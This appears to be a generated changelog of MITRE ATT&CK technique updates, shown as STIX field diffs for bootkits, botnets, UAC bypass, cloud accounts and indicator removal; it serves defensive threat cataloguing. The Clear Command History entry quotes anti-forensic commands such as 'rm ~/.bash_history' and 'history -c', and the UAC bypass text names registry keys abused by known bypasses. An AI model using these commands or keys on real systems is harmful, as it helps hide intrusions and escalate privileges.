dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Signature-based detection'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:53.857000+00:00 | 2025-04-16 20:37:17.215000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1547] Boot or Logon Autostart Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator', 'root'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:27:58.051000+00:00 | 2025-04-15 19:58:12.270000+00:00 |
external_references[1]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024. |
external_references[1]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
[T1037] Boot or Logon Initialization Scripts
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:23:13.621000+00:00 | 2025-04-15 19:58:02.121000+00:00 |
x_mitre_version | 2.3 | 2.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1542.003] Pre-OS Boot: Bootkit
Current version: 1.2
Version changed from: 1.1 → 1.2
Description (old):
Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
Description (new):
Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity)
New Detections:
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host intrusion prevention systems', 'Anti-virus', 'File monitoring'] | |
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:47.417000+00:00 | 2025-04-15 19:58:10.739000+00:00 |
description | Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. | Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) |
external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'welivesecurity', 'description': 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.', 'url': 'https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/'} |
external_references | | {'source_name': 'Microsoft Security', 'description': 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/'} |
x_mitre_data_sources | | File: File Creation |
x_mitre_data_sources | | File: File Modification |
[T1583.005] Acquire Infrastructure: Botnet
Current version: 1.1
Version changed from: 1.0 → 1.1
Description (v1.0 → v1.1): the text is unchanged apart from two additions (the full old and new values are in the Details table below).
- Added after "...booter/stresser service.": Internet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks – consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices – to serve as a botnet.(Citation: ORB Mandiant)
- Added at the end: Acquired botnets may also be used to support Command and Control activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) network.
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-15 02:49:14.664000+00:00 | 2025-04-16 13:29:34.161000+00:00 |
description | Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) | Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service.
Internet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks – consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices – to serve as a botnet.(Citation: ORB Mandiant)
With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) Acquired botnets may also be used to support Command and Control activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) network.
|
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'ORB Mandiant', 'description': 'Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved July 8, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks'} |
[T1185] Browser Session Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-02-25 18:58:15.229000+00:00 | 2025-04-15 19:58:32.147000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1110] Brute Force
Current version: 2.7
Version changed from: 2.6 → 2.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:56.556000+00:00 |
x_mitre_version | 2.6 | 2.7 |
x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Windows User Account Control'] | |
x_mitre_effective_permissions | ['Administrator'] | |
x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-21 12:35:39.112000+00:00 | 2025-04-16 20:37:15.662000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_detection | There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes. | There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes. |
x_mitre_version | 2.1 | 2.2 |
[T1218.003] System Binary Proxy Execution: CMSTP
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 19:35:43.077000+00:00 | 2025-04-15 19:58:29.296000+00:00 |
external_references[5]['description'] | Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018. | Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024. |
external_references[5]['url'] | http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ | https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
x_mitre_version | 2.1 | 2.2 |
[T1574.012] Hijack Execution Flow: COR_PROFILER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-30 21:35:12.049000+00:00 | 2025-04-15 19:59:25.301000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1546.001] Event Triggered Execution: Change Default File Association
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:27:11.065000+00:00 | 2025-04-15 19:58:52.605000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1070.003] Indicator Removal: Clear Command History
Current version: 1.6
Version changed from: 1.5 → 1.6
Description (v1.5 → v1.6): the text is unchanged apart from one addition (the full old and new values are in the Details table below).
- Added after "(Citation: US-CERT-TA18-106A)": On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host forensic analysis', 'Log analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-14 20:07:44.756000+00:00 | 2025-04-15 19:58:23.774000+00:00 |
description | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE . When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history . The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c ) or deleting the bash history file rm ~/.bash_history .
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history ).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE . When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history . The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c ) or deleting the bash history file rm ~/.bash_history .
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history ).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
external_references[4]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. |
external_references[4]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Broadcom ESXi Shell Audit', 'description': 'Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html'} |
x_mitre_platforms | | ESXi |
[T1070.007] Indicator Removal: Clear Network Connection History and Configurations
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-08 18:05:28.311000+00:00 | 2025-04-16 20:37:16.734000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1070.009] Indicator Removal: Clear Persistence
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-11 22:30:01.227000+00:00 | 2025-04-16 20:37:21.515000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1070.001] Indicator Removal: Clear Windows Event Logs
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti Virus', 'Host Intrusion Prevention Systems', 'Log Analysis'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:40:58.536000+00:00 | 2025-04-15 19:58:36.700000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1127.002] Trusted Developer Utilities Proxy Execution: ClickOnce
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['.NET Framework'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:50:41.474000+00:00 | 2025-04-15 19:59:08.154000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1059.009] Command and Scripting Interpreter: Cloud API
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 15:44:20.143000+00:00 | 2025-04-15 19:58:32.612000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1078.004] Valid Accounts: Cloud Accounts
Current version: 1.9
Version changed from: 1.8 → 1.9
Description (v1.8 → v1.9): the text is unchanged apart from the following (the full old and new values are in the Details table below).
- Removed the stray space before "(Citation: AWS Identity Federation)".
- Added at the end: For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022)
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:59:20.556000+00:00 |
description | Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
| Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. For example, in Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s to move laterally across the cloud environment.(Citation: SpecterOps Managed Identity 2022) |
x_mitre_version | 1.8 | 1.9 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'SpecterOps Managed Identity 2022', 'description': 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.', 'url': 'https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c'} |
x_mitre_contributors | | Eliraz Levi, Hunters Security |
x_mitre_contributors | | Alon Klayman, Hunters Security |
[T1651] Cloud Administration Command
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | False | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 13:42:42.543000+00:00 | 2025-04-15 19:59:13.081000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1538] Cloud Service Dashboard
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 15:51:56.279000+00:00 | 2025-04-15 19:59:16.288000+00:00 |
description | An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests. | An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, review findings of potential security risks, and run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This also allows the adversary to gain information without manually making any API requests. |
x_mitre_version | 1.4 | 1.5 |
[T1553.002] Subvert Trust Controls: Code Signing
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Windows User Account Control'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-09-22 19:13:52.548000+00:00 | 2025-04-16 20:37:16.240000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1553.006] Subvert Trust Controls: Code Signing Policy Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['User Mode Signature Validation', 'Digital Certificate Validation', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-05-05 05:00:03.480000+00:00 | 2025-04-15 19:58:33.055000+00:00 |
external_references[3]['description'] | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17, 2024. |
external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html | https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1059] Command and Scripting Interpreter
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:41.855000+00:00 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1027.004] Obfuscated Files or Information: Compile After Delivery
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
